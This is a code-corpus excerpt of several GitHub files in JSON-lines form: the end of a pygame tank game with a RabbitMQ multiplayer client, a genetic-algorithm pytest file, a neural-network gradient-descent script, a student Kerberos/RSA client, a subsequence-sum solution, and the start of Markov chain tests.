tank.change_direction(tank.KEY[event.key])\r\n if event.key in tank.KEY.keys():\r\n tank.move()\r\n if pressed[tank.KEYPULL]:\r\n shotSound.play()\r\n give_coordinates(tank)\r\n\r\n \r\n for p in shot:\r\n for tank in tanks:\r\n if (tank.x+tank.width+p.radius > p.x > tank.x - p.radius ) and ((tank.y+tank.width + p.radius > p.y > tank.y - p.radius)) and p.status==True:\r\n explosionSound.play()\r\n p.color=(0,0,0)\r\n tank.life -= 1\r\n p.status=False\r\n tank.x=random.randint(50,width-50)\r\n tank.y=random.randint(50,height-50)\r\n if tank.life == 0:\r\n font = pygame.font.SysFont(\"Times New Roman\", 70) \r\n text = font.render(\"GG WP\", 1, (0,0,0)) \r\n place = text.get_rect(center = (400,100)) \r\n screen.blit(text, place) \r\n tank1.speed = 0\r\n tank2.speed = 0\r\n lifely = False\r\n \r\n if start_time:\r\n time_since_enter = ((pygame.time.get_ticks() + start_time)/1000)\r\n message = 'Seconds since enter: ' + str(time_since_enter)\r\n screen.blit(font.render(message, True, (255,255,255)), (20, 20))\r\n \r\n \r\n for wall in map:\r\n for tank in tanks:\r\n if (wall.x + wall.height > tank.x + 9 > wall.x - tank.width) and (wall.y + wall.width> tank.y + 9> wall.y) and wall.status==True:\r\n explosionSound.play()\r\n wall.color=(0,0,0)\r\n tank.life -= 1\r\n wall.status=False\r\n if tank.life == 0:\r\n font = pygame.font.SysFont(\"Times New Roman\", 70) \r\n text = font.render(\"GG WP\", 1, (0,0,0)) \r\n place = text.get_rect(center = (400,60)) \r\n screen.blit(text, place) \r\n tank1.speed = 0\r\n tank2.speed = 0\r\n lifely = False\r\n\r\n\r\n\r\n for p in shot:\r\n for wall in map:\r\n if (wall.x + wall.height> p.x > wall.x ) and (wall.y + wall.width> p.y > wall.y) and p.status==True and wall.status == True:\r\n explosionSound.play()\r\n p.color=(0,0,0)\r\n p.status=False\r\n wall.status = False\r\n\r\n if (booster0.x + booster0.radius > tank1.x + 9 > booster0.x ) and (booster0.y + booster0.radius> tank1.y + 9 > booster0.y) and booster0.status == True:\r\n booster0.status = False\r\n timer1 = True\r\n if (booster0.x + booster0.radius > tank2.x + 9 > booster0.x ) and (booster0.y + booster0.radius> tank2.y + 9 >booster0.y) and booster0.status == True:\r\n booster0.status = False\r\n timer2 = True\r\n if timer1:\r\n time1 = time1 + (mills / 1000)\r\n if timer2:\r\n time2 = time2 + (mills / 1000)\r\n if time1 < 5 and time1 != 0:\r\n if lifely:\r\n tank1.speed = 4\r\n l0 = 5 - time1\r\n scor = \"%.2f\" % l0 \r\n text = font.render(scor, 1, (0, 191,255)) \r\n screen.blit(text, (930,500)) \r\n elif time2 < 5 and time2 != 0:\r\n if lifely:\r\n tank2.speed = 4\r\n l0 = 5 - time2\r\n scor = \"%.2f\" % l0 \r\n text = font.render(scor, 1, (255, 0, 0)) \r\n screen.blit(text, (930,290))\r\n else:\r\n if lifely:\r\n tank1.speed = 2\r\n tank2.speed = 2\r\n booster0.status = True\r\n timer1 = False\r\n time1 = 0\r\n timer2 = False\r\n time2 = 0\r\n \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n mainloop = False\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n mainloop = False\r\n \r\n for p in shot:\r\n p.move()\r\n for tank in tanks:\r\n tank.draw()\r\n tank.move()\r\n for wall in map:\r\n wall.draw()\r\n for booster in boosters:\r\n booster.draw() \r\n\r\n pygame.display.flip()\r\n\r\n#multiplayer\r\nclass TankRPCproducer:\r\n def __init__(self):\r\n self.connection = pika.BlockingConnection(\r\n pika.ConnectionParameters(\r\n host = IP,\r\n port = PORT,\r\n virtual_host = VIRTUAL_HOST,\r\n credentials = pika.PlainCredentials(\r\n username = USERNAME,\r\n password = PASSWORD\r\n )\r\n )\r\n )\r\n self.channel = self.connection.channel()\r\n\r\n result = self.channel.queue_declare(queue = '', auto_delete = True, exclusive = True)\r\n self.queue_callback = result.method.queue\r\n\r\n self.channel.queue_bind(exchange = 'X:routing.topic',\r\n queue = self.queue_callback)\r\n\r\n self.channel.basic_consume(\r\n queue = self.queue_callback,\r\n on_message_callback = self.callback,\r\n auto_ack = True\r\n )\r\n self.response = None\r\n self.corr_id = None\r\n self.token = None\r\n self.tankid = None\r\n self.roomid = None\r\n \r\n def call(self, rout_key, message = {}):\r\n self.response = None\r\n self.corr_id = str(uuid.uuid4())\r\n self.channel.basic_publish(\r\n exchange = 'X:routing.topic',\r\n routing_key = rout_key,\r\n properties = pika.BasicProperties(\r\n reply_to = self.queue_callback,\r\n correlation_id = self.corr_id,\r\n ),\r\n body=json.dumps(message)\r\n ) \r\n while self.response is None:\r\n self.connection.process_data_events()\r\n\r\n def callback(self, ch, method, properties, body):\r\n if self.corr_id == properties.correlation_id:\r\n self.response = json.loads(body)\r\n print(self.response)\r\n\r\n def health_check(self):\r\n self.call('tank.request.healthcheck')\r\n if self.response['status'] == '200':\r\n return True\r\n return False\r\n\r\n def register(self, room_id):\r\n message = {\r\n 'roomId': room_id\r\n }\r\n self.call('tank.request.register', message)\r\n if 'token' in self.response:\r\n self.token = self.response['token']\r\n self.tankid = self.response['tankId']\r\n \r\n return True\r\n return False\r\n \r\n def turn_tank(self, token, direction):\r\n message = {\r\n 'token': token,\r\n 'direction': direction\r\n }\r\n self.call('tank.request.turn', message)\r\n\r\n def fire_bullet(self, token):\r\n message = {\r\n 'token': token\r\n }\r\n self.call('tank.request.fire', message)\r\n \r\nclass TankConsumerClient(Thread):\r\n def __init__(self, room_id):\r\n super().__init__()\r\n self.connection = pika.BlockingConnection(\r\n pika.ConnectionParameters(\r\n host = IP,\r\n port = PORT,\r\n virtual_host = VIRTUAL_HOST,\r\n credentials = pika.PlainCredentials(\r\n username = USERNAME,\r\n password = PASSWORD\r\n )\r\n )\r\n )\r\n self.channel = self.connection.channel()\r\n queue=self.channel.queue_declare(queue = '',\r\n auto_delete = True,\r\n exclusive = True\r\n )\r\n event_listener = queue.method.queue\r\n self.channel.queue_bind(exchange='X:routing.topic',\r\n queue=event_listener,\r\n routing_key='event.state.'+room_id\r\n )\r\n self.channel.basic_consume(\r\n queue=event_listener,\r\n on_message_callback=self.on_response,\r\n auto_ack=True\r\n )\r\n self.response = None\r\n def on_response(self, ch, method, props, body):\r\n self.response = json.loads(body)\r\n def run(self):\r\n self.channel.start_consuming()\r\n\r\nclass defeated():\r\n def __init__(self):\r\n self.state_case = False \r\n self.state = False\r\n self.score = 0\r\n def loser_display(self):\r\n def blit_loser():\r\n pygame.display.set_mode((1100, 600))\r\n screen.blit((0,0,0))\r\n fonttext(\"You lose\", 550,180, 40, (255,223,0))\r\n fonttext(\"To Replay, press [R]\", 550, 280, 30, (255,0,0))\r\n fonttext('Your Score: ' + str(self.score), 550, 380, 40, (255,0,0))\r\n defeated_running = True\r\n while defeated_running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n defeated_running = False\r\n pygame.quit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n defeated_running = False\r\n pygame.quit()\r\n if event.key == pygame.K_r:\r\n defeated_running = False \r\n mainloop()\r\n self.state = False\r\n blit_loser()\r\n pygame.display.flip()\r\n\r\nclass victor():\r\n def __init__(self):\r\n self.state = False \r\n self.score = 0\r\n def winner_display(self):\r\n def blit_victor():\r\n pygame.display.set_mode((1100, 600))\r\n screen.fill((34, 77, 23)) \r\n fonttext(\"You win!\", 550,180, 40, (255,223,0))\r\n fonttext(\"To play again, press [R]\", 550, 280, 30, (255,0,0))\r\n fonttext('Your Score: ' + str(self.score), 550, 380, 30, (255,0,0))\r\n victory = True\r\n while victory:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n victory = False\r\n pygame.quit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n victory = False \r\n pygame.quit()\r\n if event.key == pygame.K_r:\r\n victory = False \r\n mainloop()\r\n self.state = False \r\n \r\n blit_victor()\r\n pygame.display.flip()\r\n\r\nclass afk():\r\n def __init__(self):\r\n self.score = 0\r\n self.state = False \r\n def afk_display(self): \r\n def afk_blit():\r\n pygame.display.set_mode((1100, 600))\r\n screen.fill((0,0,0))\r\n fonttext('You were kicked', 550,180, 40, (240,255,240))\r\n fonttext(\"to Replay, press [R]\", 550, 280, 30, (240,255,240))\r\n fonttext('Your Score: ' + str(self.score), 550, 380, 30, (240,255,240))\r\n running = True\r\n while running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n quit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n running = False \r\n pygame.quit()\r\n if event.key == pygame.K_r:\r\n running = False \r\n mainloop()\r\n self.state = False \r\n afk_blit()\r\n pygame.display.flip()\r\n\r\nUP = 'UP'\r\nDOWN = 'DOWN'\r\nRIGHT = 'RIGHT'\r\nLEFT = 'LEFT'\r\n\r\nMOVE_KEYS = {\r\n pygame.K_w: UP,\r\n pygame.K_a: LEFT,\r\n pygame.K_d: RIGHT,\r\n pygame.K_s: DOWN\r\n }\r\n\r\ndef draw_tanks(x, y, width, height, direction, color_tank):\r\n tank_center = (x + width // 2, y + height // 2) \r\n\r\n pygame.draw.rect(screen, color_tank, (x, y, width, height), 6)\r\n pygame.draw.circle(screen, color_tank, tank_center, width // 2,4)\r\n if direction == 'RIGHT':\r\n pygame.draw.line(screen, color_tank, (tank_center[0] + width // 2,tank_center[1]), (x + width + width // 2, y + height // 2), 4)\r\n if direction == 'LEFT':\r\n pygame.draw.line(screen, color_tank, (tank_center[0] - width // 2,tank_center[1]), (x - width // 2, y + height // 2), 4)\r\n if direction == 'UP':\r\n pygame.draw.line(screen, color_tank, (tank_center[0],tank_center[1] - width // 2), (x + width // 2, y - height // 2), 4)\r\n if direction == 'DOWN':\r\n pygame.draw.line(screen, color_tank, (tank_center[0],tank_center[1] + width // 2), (x + width // 2, y + height + height // 2), 4)\r\n\r\ndef fonttext(text, x, y, size, color):\r\n font =pygame.font.SysFont('Courier New', size)\r\n ttext = font.render(text, True, color)\r\n ttextRect = ttext.get_rect()\r\n ttextRect.center = (x, y) \r\n screen.blit(ttext, ttextRect)\r\n\r\ndef draw_bullets(x, y, width, height, color_bullet):\r\n pygame.draw.rect(screen, color_bullet,(x, y, width, height))\r\n\r\ndef multiplayer():\r\n mainloop = True\r\n screen = pygame.display.set_mode((1000,600))\r\n r = TankRPCproducer()\r\n r.health_check()\r\n r.register('room-7')\r\n event_collect = TankConsumerClient('room-7')\r\n event_collect.start()\r\n kick = afk()\r\n winner = victor()\r\n loser = defeated()\r\n pygame.display.set_caption(\"Multiplayer\")\r\n while mainloop:\r\n pygame.display.set_caption(\"Multiplayer\")\r\n screen.fill((127,255,212))\r\n pygame.draw.rect(screen, (51,21,0), (800, 0, 1000, 600))\r\n tanks = event_collect.response['gameField']['tanks']\r\n rem_time = event_collect.response['remainingTime']\r\n bullets = event_collect.response['gameField']['bullets']\r\n losers = event_collect.response['losers']\r\n winners = event_collect.response['winners']\r\n kicked = event_collect.response['kicked']\r\n if rem_time == 1:\r\n for member in winners:\r\n if r.tankid == member['tankId']:\r\n mainloop = False \r\n winner.state = True\r\n winner.score = member['score']\r\n for member in losers:\r\n if r.tankid == member['tankId']:\r\n mainloop = False \r\n loser.state = True \r\n loser.score = member['score']\r\n fonttext(\"REQUIEM\", 900, 10, 20, (0, 191,255))\r\n fonttext(\"You Health Score\", 900, 50, 16, (0, 191,255))\r\n fonttext(\"ENEMIES\", 900, 120, 20, (255,0,0))\r\n fonttext(\"Enemies Health Score\", 900, 140, 16, (255,0,0))\r\n fonttext(\"Time remained: {}\".format(rem_time),100 , 25, 18, (221, 160, 221))\r\n l = len(tanks) - 1\r\n f = l\r\n c_tanks = 0\r\n t = 0\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n mainloop = False\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n mainloop = False\r\n if event.key in MOVE_KEYS:\r\n r.turn_tank(r.token, MOVE_KEYS[event.key])\r\n if event.key == pygame.K_SPACE:\r\n r.fire_bullet(r.token)\r\n\r\n for member in kicked:\r\n if r.tankid == member['tankId']: \r\n kick.state = True \r\n kick.score = member['score']\r\n mainloop = False\r\n for member in losers:\r\n if r.tankid == member['tankId']:\r\n loser.state = True \r\n loser.score = member['score']\r\n mainloop = False\r\n for member in winners:\r\n if r.tankid == member['tankId']: \r\n winner.state = True\r\n winner.score = member['score']\r\n mainloop = False\r\n try:\r\n for tank in tanks:\r\n if r.tankid == tank['id']:\r\n draw_tanks(tank['x'], tank['y'], tank['width'],tank['height'], tank['direction'], (0, 191,255))\r\n else:\r\n c_tanks += 1\r\n draw_tanks(tank['x'], tank['y'], tank['width'],tank['height'], tank['direction'], (255,0,0))\r\n except:\r\n pass\r\n try:\r\n for bullet in bullets:\r\n if r.tankid == bullet['owner']:\r\n draw_bullets(bullet['x'], bullet['y'], bullet['width'], bullet['height'], (0, 191,255))\r\n else:\r\n draw_bullets(bullet['x'], bullet['y'], bullet['width'], bullet['height'], (255,0,0))\r\n except:\r\n pass \r\n try:\r\n for tank in tanks:\r\n if r.tankid == tank['id']: \r\n fonttext(tank['id'] + \" \" + str(tank['health']) + \" \" + str(tank['score']), 900,70,17, (0, 191,255))\r\n else:\r\n fonttext(tank['id'] + \" \" + str(tank['health']) + \" \" + str(tank['score']), 900,160 + (20 * t),17, (255,0,0))\r\n t = t + 1 \r\n if f == 0:\r\n t = 0\r\n f = g\r\n f = f - 1\r\n if c_tanks + 1 != len(tanks):\r\n mainloop = False\r\n loser.state_case = True\r\n except:\r\n pass\r\n pygame.display.flip()\r\n \r\n if kick.state == True:\r\n kick.afk_display()\r\n elif winner.state == True:\r\n winner.winner_display()\r\n elif loser.state == True:\r\n loser.loser_display()\r\n elif loser.state_case == True:\r\n loser.loser_display()\r\n\r\n \r\n\r\nwhile True:\r\n mainpage()\r\n\r\npygame.quit()","repo_name":"Daryn-san/FINALE","sub_path":"19b030301.py","file_name":"19b030301.py","file_ext":"py","file_size_in_byte":26638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3983300288","text":"# Created by Andy at 04-Jan-21\n\n# Enter description here\n\n# ___________________________________\nimport pytest\nfrom hypothesis import strategies as st, given\nimport time\nfrom genetic_algo import *\nfrom genetic_algo.ga_tools import quantise, back_to_float\n\ndef test_encoding_decoding(default_solver):\n default_solver.initialise_population()\n pop_list = default_solver._current_population\n for person in pop_list:\n encoded = quantise(person.x, default_solver.n_encoding_bits, default_solver._upper, default_solver._lower)\n assert all(len(j) == default_solver.n_encoding_bits+2 for j in encoded)\n decoded = back_to_float(encoded, default_solver.n_encoding_bits, default_solver._upper, default_solver._lower)\n assert all(a-b<0.001 for a,b in zip(person.x, decoded))\n\n\n\n\n\n\n\n\n\n\n@pytest.fixture(autouse=True)\ndef default_solver():\n solver = GASolver(obj_fn=rana)\n return solver\n del solver\n\n\n@pytest.fixture(autouse=True)\ndef timer():\n start = time.time()\n yield\n finish = time.time()\n print(f\"\\n The test finished in {finish - start :.3f} seconds\" )","repo_name":"ajc327/Genetic_Algorithm_Solver","sub_path":"test/test_encoding.py","file_name":"test_encoding.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38604213608","text":"\"\"\"\n# Consider the objective function F(u1,....,uN-1), notice that u0 and uN are given by the boundary\n# condition, and therefore no need to be considered. Here F is defined as:\n# sum_i=1^N(partial y/partial x (ui-1)-partial y/partial x (ui))^2\n# we want to find the minimizer of F, namely u*.\n# what we need to do is to compute the value of 5 derivative by NN at each iteration, where the Gradient\n# descent scheme is given by u(k+1)=u(k)-grad(F), i.e. for each i, ui(k+1)=ui(k)-partial(F)/partial(ui)\n\"\"\"\nimport numpy as np\nfrom tensorflow.keras.models import load_model\n\n\n# from keras.models import load_model\n\n\ndef udiff(saveArray):\n return np.linalg.norm(saveArray[-1] - saveArray[-2])\n\n\ndef coarseFunc(u):\n return u * (Dx1 @ u) - Dx2 @ u - r0\n\n\n# defining target function, take DU as an input of size (which contains different partial derivative from the NN\n\n# number of intervals\nN = 10\n\n# boundary condition for the target problem, u(-1)=a, u(1)=b\na = 0.6\nb = -0.8\n\n# a = -0.3\n# b = 1\n#\n# a = 0.8\n# b = 0.2\n\nr0 = np.hstack([a, np.zeros(N - 1), b])\n# step size on coarse grid\nh = 2 / N\n# assigning derivative matrix\nDx1 = np.eye(N + 1, k=1) - np.eye(N + 1, k=-1)\nDx1 = Dx1 / (2 * h)\n# First and last row of Dx1 is zero for applying boundary condition\nDx1[0, :] = np.zeros(N + 1)\nDx1[N, :] = np.zeros(N + 1)\n\nDx2 = np.eye(N + 1, k=1) + np.eye(N + 1, k=-1) - 2 * np.eye(N + 1, k=0)\nDx2 = Dx2 / (2 * h * 2 * h)\n\n# For applying boundary condition\nDx2[0, :] = np.hstack((-1, np.zeros(N)))\nDx2[N, :] = np.hstack((np.zeros(N), -1))\n\n# import model for looping\ndata_x = np.loadtxt('data_x2_10interval.txt', delimiter=',')\ntarget = np.loadtxt('target2_10interval.txt', delimiter=',')\nmodel = load_model('model/model_10intervals.h5')\nN = 10\n\nsol = np.array([0.6, 0.44647016, 0.22890003, -0.03090544, -0.28457717, -0.48797398,\n -0.62682007, -0.71150875, -0.7596639, -0.78595875, -0.8])\n# sol = np.array([-0.3, -0.19805781, -0.11122511, -0.03186265, 0.04548198, 0.12572309,\n# 0.21455435, 0.32025255, 0.45737722, 0.65668735, 1.])\n# sol = np.array([0.8, 0.79858638, 0.79590838, 0.79084667, 0.78132081, 0.76353872,\n# 0.7308424, 0.67236035, 0.57274539, 0.41640301, 0.2])\n\n# initial guess\nu_array = np.empty([N + 1, 1])\nu_iter = np.linspace(a, b, N + 1)[1:-1]\nu_iter = np.copy(sol[1:-1])\nu = np.hstack([a, u_iter, b])\nprint(coarseFunc(sol))\n\n# instead of defining function F, we set the stopping criteria as |e_k|=|uk+1-u_k| since then we don't need to compute\n# all partial derivative for every loop\n\ncount = 0\nalpha = 0.001\ntol = 0.0000001\n\n# while np.linalg.norm(u - sol) / np.linalg.norm(sol) > tol:\nwhile count < 100:\n # defining array for storing partial derivative for each loop (since u are different for each loop)\n store = np.zeros([N, 6])\n count = count + 1\n\n for i in range(N):\n store[i, :] = model.predict(np.array([u[i:i + 2]]))\n # store = np.vstack((store, model.predict(np.array([[u[N - 1], u[0]]]))))\n # using the prediction to do the iteration\n # print(count, \"th store\", store)\n\n F = np.linalg.norm(store[0:N - 1, 1] - store[1:N, 0]) ** 2\n print(count)\n print(\"The error of F of last iteration is: \", F)\n # update u[2,N-2],which is the sol except the first two and last two entry\n # the first two corresponding to u[2]\n grad = 2 * (store[0:N - 3, 1] - store[1:N - 2, 0]) * (store[1:N - 2, 4]) + 2 * (\n store[1:N - 2, 5] - store[2:N - 1, 2]) * (store[1:N - 2, 1] - store[2:N - 1, 0]) + 2 * (\n store[2:N - 1, 1] - store[3:N, 0]) * (store[2:N - 1, 3])\n u_iter[1:-1] = u_iter[1:-1] - alpha * grad\n print(store)\n # update the second last and second first entry, i.e. u[1] and u[N-1], where u is the solution\n u_iter[0] = u_iter[0] - alpha * (2 * (store[0, 5] - store[1, 2]) * (store[0, 1] - store[1, 0]) + 2 * (\n store[1, 1] - store[2, 0]) * (store[1, 3]))\n u_iter[-1] = u_iter[-1] - alpha * (2 * (store[N - 3, 1] - store[N - 2, 0]) * (store[N - 2, 4]) + 2 * (\n store[N - 2, 5] - store[N - 1, 2]) * (store[N - 2, 1] - store[N - 1, 0]))\n\n u = np.hstack([a, u_iter, b])\n u_array = np.append(u_array, u)\n # print(u_iter)\n print(\"u: \", u)\n print(\"Error array: \", u - sol)\n print(\"Error with fine grid:\", np.linalg.norm(u - sol) / np.linalg.norm(sol))\n\n# print(count)\nprint(\"end\")\nprint(coarseFunc(u))\n","repo_name":"CheukHinHoJerry/UROP","sub_path":"UROP/gradientdescent.py","file_name":"gradientdescent.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5165902299","text":"#TGS启动后创建两个线程,1.接收 2.发送 接收 得到连接请求后则创建一个线程,用于处理接收操作,接收后再进行处理 发送,直接给AS发送证书\nimport threading\nimport socket\nfrom RSA import getKey\nimport pymysql\nimport tkinter.messagebox as messagebox # 弹窗\nimport RSA as rsa\nimport datetime\nimport des_for_rsa as des\nHOST = '192.168.43.238'\n# HOST= '127.0.0.1'\n\nPORT_TGS = 65433\nPORT_V = 65434\nPORT_AS = 65432\n\nserial_num = 1\n\ndef change_to_bytes(my_uint):\n if my_uint == 0:\n return bytes(1)\n result = my_uint.to_bytes((my_uint.bit_length() + 7) // 8, 'big') # 8位划分,尽量少补零\n return result\n\n# 获取时间戳\ndef get_time():\n start_time = datetime.datetime(2023, 5, 1, 0, 0, 0)\n now = datetime.datetime.now()\n ts = (now - start_time).seconds\n return ts\n\n# ack打包函数,ack只需要传递包头\ndef packet_ack(port, num, type_message, fin,pipei,rongyu):\n my_port = port\n server_port = port\n serial_num = num\n type_mes = type_message\n FIN = fin\n pipei_num=pipei\n baoliu = rongyu\n ack = my_port + b'|' + server_port + b'|' + serial_num + b'|' + type_mes + b'|' + FIN + b'|'+pipei_num + b'|'+ baoliu\n return ack\n\n#拆data部分\ndef unpacket_lisence(cont_data):\n id,e,n = cont_data.split(\",\")\n return id,e,n\n # return id,e,n\n\ndef unpacket_key_head(packet):\n port, my_port, num, type_message, fin, pipei, rongyu, data=packet.split(b'|')\n print(\"这个的data是: \",data)\n print(\"类型为:\",type(data))\n return data\n\ndef unpacket_TS_head(packet):\n port, my_port, num, type_message, fin, pipei, rongyu, data=packet.split(b'|')\n print(\"这个的data是: \",data)\n print(\"类型为:\",type(data))\n return type_message,data\n\n# 拆包报头\ndef unpacket(packet):\n port, my_port, num, type_message, fin, pipei, rongyu, data = packet.decode().split(\"|\")\n print(\"来源端口\", port, \"类型\", type(port))\n print(\"序列号\", num)\n print(\"信息类型\", type_message)\n print(\"结束标识\", fin)\n print(\"匹配为\",pipei)\n print(\"数据\", data)\n return type_message , pipei , data #返回值添加一个fin\n\n# 打包报头部分\ndef packet_head(port, num, type_message, fin,pipei, rongyu, data):\n my_port = port\n server_port = port\n serial_num = num\n type_mes = type_message\n FIN = fin\n pipei_num=pipei\n baoliu = rongyu\n baotou = my_port + b'|' + server_port + b'|' + serial_num + b'|' + type_mes + b'|' + FIN +b'|'+pipei_num+ b'|' + baoliu\n a_packet = baotou + b'|' + data\n print(a_packet)\n return a_packet\n\n#打包data部分\ndef packet_lisence(id,e,n):\n return id + b',' + e + b',' +n\n\n#C->AS,Kerberos过程打包data\ndef packet_data_2003(IDc,IDtgs):\n ts=get_time()\n TS=str(ts)\n ts1=TS.encode()\n return IDc+b','+IDtgs+b','+ts1\n\n#接受2004号报文(AS的ticket【tgs】\ndef recv_2004(data):\n global key_as,Key_c_to_tgs\n # Keyc='数据库里rsa发的key,转化为int'\n # key_as='67333333'\n print(\"C使用的key:\",key_as,type(key_as))\n encry_data=des.decrypt(data,key_as)\n print(\"解密用的key:\",key_as)\n print(\"****encry_data******\",encry_data,type(encry_data))\n Key_c_to_tgs,IDtgs,TS2,Lifetime2,ticket_tgs=encry_data.split(',')\n ts2 = int(TS2)\n now_time = get_time()\n if now_time - ts2 <= 10:\n return ticket_tgs\n else:\n return 'error'\n \n#处理接收到的数据内容\ndef solve_receive(conn, addr):\n # 接收客户端发送的消息\n with conn:\n while True:\n # 接收客户端发送的消息\n data = conn.recv(1024)\n if not data:\n break\n # 打印接收到的消息\n print('收到来自客户端的消息:', data.decode())\n print(data)\n # print('data: ',type(data),'data.decode',type(data.decode()))\n # 发送响应消息\n conn.sendall(b'Received: ' + data)\n \n\n#处理接收到的AS的证书\ndef process_AS_message_2001(cont_data,s):\n global serial_num,id_as,e_as,n_as,key_as\n # print(\"已接收到消息类型为2001的数据段,是传递证书的报文\")\n print(\"拆除掉报头部分的内容: \",cont_data)\n #得到id、e、n\n # id,e,n=unpacket_lisence(cont_data)\n #将id、e、n存入数据库中\n # save_sql(cont_data)\n id_as,e_as,n_as=unpacket_lisence(cont_data)\n print(\"as的id:\",id_as,\"as的e:\",e_as,\"as的n\",n_as)\n mack=packet_ack(b'65432',str(serial_num).encode(),b'2000',b'0',b'1001',b'00000000')\n print(\"mack:\",mack)\n s.sendall(mack)\n print(\"成功发送mack给AS\")\n serial_num=serial_num+1\n key_rcv=s.recv(1024)\n print(\"接收到的key_message为:\",key_rcv)\n secret_key=unpacket_key_head(key_rcv)\n secret_key=rsa.change_to_uint(secret_key)\n print(\"secret_key:\",secret_key)\n print(\"所使用的c私钥d,n为: \",d_c,n_c)\n key_as=rsa.rsa_decrypt(secret_key,d_c,n_c)\n key_as=key_as.decode()\n print(\"我得到的DES key为: \",key_as)\n\n flag='recv_2001'\n return flag\n\ndef process_AS_message_2002():\n pass\n\n# 使用字典存储每个值对应的处理函数\nprocess_dict = {\n \"2001\": process_AS_message_2001,\n \"2002\": process_AS_message_2002,\n}\n\n#发送的主线程 A发送->B接收->B发送->A接收\ndef send_thread():\n \"\"\"发送数据线程函数\"\"\"\n print('发送已启动,准备发送...')\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT_AS))\n # 从命令行读取用户输入\n # print(type(threading.get_ident()))\n global serial_num,n_c,e_c,d_c\n # serial_num_byte=serial_num.to_bytes(4, byteorder='big') \n n_c,e_c,d_c=getKey()\n print(\"e_c:\",e_c,\"n_c\",n_c,\"d_c\",d_c)\n data=packet_lisence(b'1004',str(e_c).encode(),str(n_c).encode())\n print(\"数据段:\",data)\n message=packet_head(b'65432',str(serial_num).encode(),b'2001',b'0',b'0000',b'00000000',data)\n serial_num=serial_num+1\n # print(serial_num)\n # message = input(\"hi,i am tgs\")\n # 发送数据到服务器\n s.sendall(message)\n #接收发送回来的内容,再关闭连接。\n rcv_message = s.recv(1024)\n print(\"rcv_message:\",rcv_message)\n type_message_rcv,pipei,cont_data_rcv=unpacket(rcv_message)\n print(\"消息类型为:\",type_message_rcv)\n print(\"数据内容为:\",cont_data_rcv)\n if type_message_rcv in process_dict:\n process_dict[type_message_rcv](cont_data_rcv,s)\n else:\n # 处理其他情况\n print(\"可能有错误\")\n \n\ndef send_kerberos_thread():\n '''Kerberos发送线程函数'''\n print('kerberos发送已启动,准备发送...')\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT_AS))\n #获取2003报文\n global serial_num\n num=serial_num#更换成相应序列号\n serial_num=serial_num+1\n data_2003=packet_data_2003(b'1004',b'1002')\n message_2003=packet_head(b'65433',b'3',b'2003',b'0',b'0000',b'00000000',data_2003)\n s.sendall(message_2003)\n message_2004=s.recv(1024)\n print(message_2004)\n type_message,data_2004=unpacket_TS_head(message_2004)\n ticket_tgs=recv_2004(data_2004)\n if ticket_tgs=='error':\n # a='发送超时反馈'\n mack=packet_ack(b'65432',b'4',b'2000',b'0',b'0000',b'ts2to')\n s.sendall(mack)\n else:\n print(\"******我与AS通信成功啦******\")\n \n\n #创建和tgs通信的线程\n\n # type_message,data_2004=unpacket(message_2004)\n # ticket_tgs=recv_2004(data_2004)\n # if ticket_tgs=='error':\n # print(\"发送超时反馈\")\n # a='发送超时反馈'\n # else:\n # pass\n # #创建和tgs通信的线程\n\nmsend_thread = threading.Thread(target=send_thread)\nmsend_kerberos_thread=threading.Thread(target=send_kerberos_thread)\nmsend_thread.start()\nmsend_thread.join()\nmsend_kerberos_thread.start()\nmsend_thread.join()\n","repo_name":"Guiziming/Kerberos-","sub_path":"C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":8238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37122811662","text":"def solution(sequence, k):\n answer = []\n n = len(sequence)\n limit_sum, end = 0,0\n sequence.sort()\n \n for i in range(len(sequence)):\n while limit_sum < k and end < n:\n limit_sum += sequence[end]\n end +=1\n \n if limit_sum == k:\n answer.append([i, end-1, end-1-i])\n \n limit_sum-= sequence[i]\n \n answer = sorted(answer, key=lambda x: x[2])\n \n return answer[0][:2]","repo_name":"sohyeonnn/Problem-Solving","sub_path":"프로그래머스/unrated/178870. 연속된 부분 수열의 합/연속된 부분 수열의 합.py","file_name":"연속된 부분 수열의 합.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10628017235","text":"\"\"\"\nTest Markov chain functions that do not require random sampling.\n\nThe tests themselves may use random sampling.\n\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\n\nimport numpy as np\nimport networkx as nx\n\nfrom numpy.testing import (run_module_suite, TestCase,\n assert_equal, assert_allclose, assert_)\n\nfrom raoteh.sampler import _mc0, _mc0_dense\nfrom raoteh.sampler import _mcy, _mcy_dense\n\nfrom raoteh.sampler._density import dict_to_numpy_array\nfrom raoteh.sampler._sample_tree import get_random_branching_tree\n\n\ndef _get_random_nx_transition_matrix(nstates):\n \"\"\"\n Sample a random sparse state transition matrix.\n\n Each row of the transition matrix will be missing an entry.\n\n Parameters\n ----------\n nstates : integer\n The number of states in the transition matrix.\n\n Returns\n -------\n P : directed weighted networkx graph\n The sparse transition matrix.\n\n \"\"\"\n P = nx.DiGraph()\n for i in range(nstates):\n jmissing = 